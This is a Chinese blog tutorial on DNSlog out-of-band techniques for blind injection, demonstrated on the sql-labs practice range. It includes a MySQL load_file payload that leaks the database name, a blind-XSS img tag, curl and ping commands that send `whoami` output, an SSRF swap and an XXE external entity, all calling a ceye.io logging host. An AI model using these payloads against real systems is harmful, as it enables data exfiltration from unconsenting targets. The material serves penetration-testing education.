<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.1.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"hzktester.top","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="DNSlog回显原理首先需要有一个可以配置的域名，比如：ceye.io，然后通过代理商设置域名 ceye.io 的 nameserver 为自己的服务器 A，然后再服务器 A 上配置好 DNS Server，这样以来所有 ceye.io 及其子域名的查询都会到服务器 A 上，这时就能够实时地监控域名查询请求了，图示如下。  DNS在解析的时候会留下日志，这个就是读取多级域名的解析日志，来获取信息简">
<meta property="og:type" content="article">
<meta property="og:title" content="巧用DNSlog实现无回显注入">
<meta property="og:url" content="https://hzktester.top/posts/b6cdb199.html">
<meta property="og:site_name" content="Hzktester&#96;s Blog">
<meta property="og:description" content="DNSlog回显原理首先需要有一个可以配置的域名，比如：ceye.io，然后通过代理商设置域名 ceye.io 的 nameserver 为自己的服务器 A，然后再服务器 A 上配置好 DNS Server，这样以来所有 ceye.io 及其子域名的查询都会到服务器 A 上，这时就能够实时地监控域名查询请求了，图示如下。  DNS在解析的时候会留下日志，这个就是读取多级域名的解析日志，来获取信息简">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://qiniu.hzktester.top/tp2020112001.png">
<meta property="og:image" content="https://qiniu.hzktester.top/tp2020112002.png">
<meta property="og:image" content="https://qiniu.hzktester.top/tp2020112003.png">
<meta property="og:image" content="https://qiniu.hzktester.top/tp2020112004.png">
<meta property="og:image" content="https://qiniu.hzktester.top/tp2020112005.png">
<meta property="og:image" content="https://qiniu.hzktester.top/tp2020112006.png">
<meta property="og:image" content="https://qiniu.hzktester.top/tp2020112007.png">
<meta property="og:image" content="https://qiniu.hzktester.top/tp2020112008.png">
<meta property="og:image" content="https://qiniu.hzktester.top/tp2020112009.png">
<meta property="og:image" content="https://qiniu.hzktester.top/tp2020112010.png">
<meta property="og:image" content="https://qiniu.hzktester.top/tp2020112011.png">
<meta property="article:published_time" content="2020-11-20T03:42:00.000Z">
<meta property="article:modified_time" content="2020-11-20T03:45:51.426Z">
<meta property="article:author" content="hzktester">
<meta property="article:tag" content="DNSlog">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://qiniu.hzktester.top/tp2020112001.png">

<link rel="canonical" href="https://hzktester.top/posts/b6cdb199.html">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>巧用DNSlog实现无回显注入 | Hzktester`s Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="Hzktester`s Blog" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>
	
	<a target="_blank" rel="noopener" href="https://github.com/hzktester" class="github-corner" aria-label="View source on GitHub"><svg width="80" height="80" viewBox="0 0 250 250" style="fill:#64CEAA; color:#fff; position: absolute; top: 0; border: 0; right: 0;" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a><style>.github-corner:hover .octo-arm{animation:octocat-wave 560ms ease-in-out}@keyframes octocat-wave{0%,100%{transform:rotate(0)}20%,60%{transform:rotate(-25deg)}40%,80%{transform:rotate(10deg)}}@media (max-width:500px){.github-corner:hover .octo-arm{animation:none}.github-corner .octo-arm{animation:octocat-wave 560ms ease-in-out}}</style>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Hzktester`s Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://hzktester.top/posts/b6cdb199.html">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="hzktester">
      <meta itemprop="description" content="偷偷努力，然后惊艳所有人">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hzktester`s Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          巧用DNSlog实现无回显注入
        </h1>

        <div class="post-meta">
			
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2020-11-20 11:42:00 / 修改时间：11:45:51" itemprop="dateCreated datePublished" datetime="2020-11-20T11:42:00+08:00">2020-11-20</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Web%E6%B8%97%E9%80%8F/" itemprop="url" rel="index"><span itemprop="name">Web渗透</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" style="display: inline;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span><br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>1.9k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>2 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="DNSlog回显原理"><a href="#DNSlog回显原理" class="headerlink" title="DNSlog回显原理"></a>DNSlog回显原理</h1><p>首先需要有一个可以配置的域名，比如：<code>ceye.io</code>，然后通过代理商设置域名 <code>ceye.io</code> 的 <code>nameserver</code> 为自己的服务器 A，然后再服务器 A 上配置好 <code>DNS Server</code>，这样以来所有 <code>ceye.io</code> 及其子域名的查询都会到服务器 A 上，这时就能够实时地监控域名查询请求了，图示如下。<br><img src="https://qiniu.hzktester.top/tp2020112001.png" alt="tp2020112001.png"></p>
<blockquote>
<p>DNS在解析的时候会留下日志，这个就是读取多级域名的解析日志，来获取信息<br>简单来说就是把信息放在高级域名中，传递到自己这，然后读取日志，获取信息</p>
</blockquote>
<h1 id="利用场景"><a href="#利用场景" class="headerlink" title="利用场景"></a>利用场景</h1><p>在<code>sql</code>注入时为布尔盲注、时间盲注，注入的效率低且线程高容易被<code>waf</code>拦截，又或者是目标站点没有回显，我们在读取文件、执行命令注入等操作时无法明显的确认是否利用成功，这时候就要用到我们的<code>DNSlog</code>注入。</p>
<h1 id="推荐平台"><a href="#推荐平台" class="headerlink" title="推荐平台"></a>推荐平台</h1><ul>
<li><a target="_blank" rel="noopener" href="http://www.dnslog.cn/">http://www.dnslog.cn</a></li>
<li><a target="_blank" rel="noopener" href="http://admin.dnslog.link/">http://admin.dnslog.link</a></li>
<li><a target="_blank" rel="noopener" href="http://ceye.io/">http://ceye.io</a></li>
</ul>
<p>以下利用，我这里使用<code>ceye</code>平台演示。<br><img src="https://qiniu.hzktester.top/tp2020112002.png" alt="image.png"><br>他会给你一个三级域名，你把信息写在第四级域名上就好了，比如我这里访问hzktester.xxxx.cece.io ，访问之后就会有查询记录。<br><img src="https://qiniu.hzktester.top/tp2020112003.png" alt="tp2020112003.png"><br><img src="https://qiniu.hzktester.top/tp2020112004.png" alt="image.png"></p>
<h2 id="利用一：SQL注入"><a href="#利用一：SQL注入" class="headerlink" title="利用一：SQL注入"></a>利用一：SQL注入</h2><h3 id="利用场景："><a href="#利用场景：" class="headerlink" title="利用场景："></a>利用场景：</h3><p>不论是<code>bool</code>型盲注还是时间型盲注，都需要频繁的跑请求才能够获取数据库中的值，在现代<code>WAF</code>的防护下，很可能导致IP被<code>ban</code>。</p>
<p>这个时候我们可以结合<code>DNSLOG</code>完美快速的将数据取出。如遇到<code>MySql</code>的盲注时，可以利用内置函数<code>load_file()</code>来完成<code>DNSLOG</code>。<code>load_file()</code>不仅能够加载本地文件，同时也能对诸如\<a target="_blank" rel="noopener" href="http://www.test.com/">www.test.com</a>这样的<code>URL</code>发起请求。</p>
<h3 id="利用前提"><a href="#利用前提" class="headerlink" title="利用前提"></a>利用前提</h3><p><code>load_file()</code>需要设置<code>secure_file_priv</code>的值，可以参考这篇文章，这里就不赘述了。<a href="https://hzktester.top/posts/d83e4025.html">链接</a></p>
<h3 id="sql-labs靶场复现"><a href="#sql-labs靶场复现" class="headerlink" title="sql-labs靶场复现"></a>sql-labs靶场复现</h3><p>在<code>mysql</code>命令行执行：<code>select load_file(&#39;\\\\afanti.xxxx.ceye.io\\aaa&#39;);</code>其中<code>afanti</code>就是要注入的查询语句</p>
<p><code>payload</code>：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x27; and if((select load_file(concat(&#x27;\\\\&#x27;,(select database()),&#x27;.xxxxx.ceye.io\\aaa&#x27;))),1,0)--+</span><br></pre></td></tr></table></figure>
<p><img src="https://qiniu.hzktester.top/tp2020112005.png" alt="tp2020112005.png"><br>查看平台，<code>dnsLog</code>被记录下来。<br><img src="https://qiniu.hzktester.top/tp2020112006.png" alt="image.png"><br>ps：稍微解释一下这个语句，这里使用<code>concat</code>函数将<code>(select database())</code>得到的内容作为查询<code>url</code>的一部分，和我们的平台三级域名拼接组合成一个四级域名，而<code>load_file</code>函数会通过<code>dns</code>解析请求，所以我们在<code>dnslog</code>平台就可以看到查询的记录(<strong>包含着我们注入出的数据</strong>)</p>
<p>对于表段，由于<code>load_file()</code>一次只能传输一条数据，所以查询的时候需要使用<code>limit</code>来一个一个的解析。</p>
<h2 id="利用二：XSS盲打"><a href="#利用二：XSS盲打" class="headerlink" title="利用二：XSS盲打"></a>利用二：XSS盲打</h2><h3 id="利用场景-1"><a href="#利用场景-1" class="headerlink" title="利用场景"></a>利用场景</h3><p>通过盲打，让触发者浏览器访问预设至的链接地址，如果盲打成功，会在平台上收到如下的链接访问记录：</p>
<h3 id="payload："><a href="#payload：" class="headerlink" title="payload："></a>payload：</h3><p><code>&lt;img src=http://xss.xxxx.ceye.io/aaa&gt;</code>：让<code>src</code>请求自己的<code>dnslog</code>平台<br><img src="https://qiniu.hzktester.top/tp2020112007.png" alt="tp2020112007.png"></p>
<h2 id="利用三：命令执行无回显"><a href="#利用三：命令执行无回显" class="headerlink" title="利用三：命令执行无回显"></a>利用三：命令执行无回显</h2><h3 id="利用场景-2"><a href="#利用场景-2" class="headerlink" title="利用场景"></a>利用场景</h3><p>针对不回显的命令注入漏洞，我们很难确定漏洞的存在并进一步利用，针对这种情况，我们可以利用<code>DNSLOG</code>来获取命令的执行结果。</p>
<h3 id="linux："><a href="#linux：" class="headerlink" title="linux："></a>linux：</h3><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">curl http://haha.xxx.ceye.io/`whoami`</span><br><span class="line">ping `whoami`.haha.xxx.ceye.io</span><br></pre></td></tr></table></figure>
<p><img src="https://qiniu.hzktester.top/tp2020112008.png" alt="tp2020112008.png"><br><img src="https://qiniu.hzktester.top/tp2020112009.png" alt="image.png"></p>
<h3 id="windows"><a href="#windows" class="headerlink" title="windows"></a>windows</h3><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ping %USERNAME%.xxx.ceye.io</span><br></pre></td></tr></table></figure>
<p><img src="https://qiniu.hzktester.top/tp2020112010.png" alt="tp2020112010.png"><br><img src="https://qiniu.hzktester.top/tp2020112011.png" alt="image.png"><br>这里的<code>%username%</code>为用户变量</p>
<h2 id="利用四：SSRF"><a href="#利用四：SSRF" class="headerlink" title="利用四：SSRF"></a>利用四：SSRF</h2><p>这个没什么好说的，直接上<code>payload</code>，我们直接将<code>ssrf</code>中地址换成我们的<code>dnslog</code>平台<br>比如原本我们利用的是<code>url=127.0.0.1:8080</code><br>利用<code>dnslog</code>就换成 <code>url=xxx.cece.io</code><br>然后看我们的<code>dnslog</code>平台是否有服务器的<code>IP</code>来判断。</p>
<h2 id="利用五：XXE"><a href="#利用五：XXE" class="headerlink" title="利用五：XXE"></a>利用五：XXE</h2><h3 id="利用场景：-1"><a href="#利用场景：-1" class="headerlink" title="利用场景："></a>利用场景：</h3><p>当我们遇到<code>XXE</code>，如果这个<code>XXE</code>漏洞可以解析外部实体，那么不用说，就可以拿来读取本地服务器文件，这时，我们只需把文件改成这样：</p>
<h3 id="payload：-1"><a href="#payload：-1" class="headerlink" title="payload："></a>payload：</h3><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;</span></span><br><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">root</span> [</span></span><br><span class="line"><span class="meta"><span class="meta">&lt;!ENTITY % <span class="meta-keyword">remote</span> <span class="meta-keyword">SYSTEM</span> <span class="meta-string">&quot;http://ip.port.xxxx.ceye.io/xxe_test&quot;</span>&gt;</span></span></span><br><span class="line"><span class="meta">%remote;]&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">root</span>/&gt;</span></span><br></pre></td></tr></table></figure>



    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>hzktester
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://hzktester.top/posts/b6cdb199.html" title="巧用DNSlog实现无回显注入">https://hzktester.top/posts/b6cdb199.html</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/DNSlog/" rel="tag"><i class="fa fa-tag"></i> DNSlog</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/posts/1a711be2.html" rel="prev" title="XXE漏洞总结">
      <i class="fa fa-chevron-left"></i> XXE漏洞总结
    </a></div>
      <div class="post-nav-item">
    <a href="/posts/53895abe.html" rel="next" title="PHP-任意文件读取/下载漏洞">
      PHP-任意文件读取/下载漏洞 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#DNSlog%E5%9B%9E%E6%98%BE%E5%8E%9F%E7%90%86"><span class="nav-number">1.</span> <span class="nav-text">DNSlog回显原理</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E5%9C%BA%E6%99%AF"><span class="nav-number">2.</span> <span class="nav-text">利用场景</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%8E%A8%E8%8D%90%E5%B9%B3%E5%8F%B0"><span class="nav-number">3.</span> <span class="nav-text">推荐平台</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E4%B8%80%EF%BC%9ASQL%E6%B3%A8%E5%85%A5"><span class="nav-number">3.1.</span> <span class="nav-text">利用一：SQL注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E5%9C%BA%E6%99%AF%EF%BC%9A"><span class="nav-number">3.1.1.</span> <span class="nav-text">利用场景：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E5%89%8D%E6%8F%90"><span class="nav-number">3.1.2.</span> <span class="nav-text">利用前提</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sql-labs%E9%9D%B6%E5%9C%BA%E5%A4%8D%E7%8E%B0"><span class="nav-number">3.1.3.</span> <span class="nav-text">sql-labs靶场复现</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E4%BA%8C%EF%BC%9AXSS%E7%9B%B2%E6%89%93"><span class="nav-number">3.2.</span> <span class="nav-text">利用二：XSS盲打</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E5%9C%BA%E6%99%AF-1"><span class="nav-number">3.2.1.</span> <span class="nav-text">利用场景</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#payload%EF%BC%9A"><span class="nav-number">3.2.2.</span> <span class="nav-text">payload：</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E4%B8%89%EF%BC%9A%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%97%A0%E5%9B%9E%E6%98%BE"><span class="nav-number">3.3.</span> <span class="nav-text">利用三：命令执行无回显</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E5%9C%BA%E6%99%AF-2"><span class="nav-number">3.3.1.</span> <span class="nav-text">利用场景</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#linux%EF%BC%9A"><span class="nav-number">3.3.2.</span> <span class="nav-text">linux：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#windows"><span class="nav-number">3.3.3.</span> <span class="nav-text">windows</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E5%9B%9B%EF%BC%9ASSRF"><span class="nav-number">3.4.</span> <span class="nav-text">利用四：SSRF</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E4%BA%94%EF%BC%9AXXE"><span class="nav-number">3.5.</span> <span class="nav-text">利用五：XXE</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E5%9C%BA%E6%99%AF%EF%BC%9A-1"><span class="nav-number">3.5.1.</span> <span class="nav-text">利用场景：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#payload%EF%BC%9A-1"><span class="nav-number">3.5.2.</span> <span class="nav-text">payload：</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="hzktester"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">hzktester</p>
  <div class="site-description" itemprop="description">偷偷努力，然后惊艳所有人</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">72</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">27</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/hzktester" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;hzktester" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:1243547769@qq.com" title="E-Mail → mailto:1243547769@qq.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      Links
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="http://hackergu.com/" title="http:&#x2F;&#x2F;hackergu.com&#x2F;" rel="noopener" target="_blank">Gu</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://sunian.top/" title="https:&#x2F;&#x2F;sunian.top&#x2F;" rel="noopener" target="_blank">sunian</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://wintrysec.github.io/" title="https:&#x2F;&#x2F;wintrysec.github.io&#x2F;" rel="noopener" target="_blank">wintrysec</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        
<div class="BbeiAn-info">
    晋ICP备 -
    <a target="_blank"  href="http://www.beian.gov.cn/">2020010889号-1</a>
</div>
<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">hzktester</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="站点总字数">155k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">2:21</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>
        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" style="display: inline;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" style="display: inline;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  
  <script color='0,0,0' opacity='0.5' zIndex='-1' count='150' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  
  <script>
    (function(){
      var canonicalURL, curProtocol;
      //Get the <link> tag
      var x=document.getElementsByTagName("link");
		//Find the last canonical URL
		if(x.length > 0){
			for (i=0;i<x.length;i++){
				if(x[i].rel.toLowerCase() == 'canonical' && x[i].href){
					canonicalURL=x[i].href;
				}
			}
		}
    //Get protocol
	    if (!canonicalURL){
	    	curProtocol = window.location.protocol.split(':')[0];
	    }
	    else{
	    	curProtocol = canonicalURL.split(':')[0];
	    }
      //Get current URL if the canonical URL does not exist
	    if (!canonicalURL) canonicalURL = window.location.href;
	    //Assign script content. Replace current URL with the canonical URL
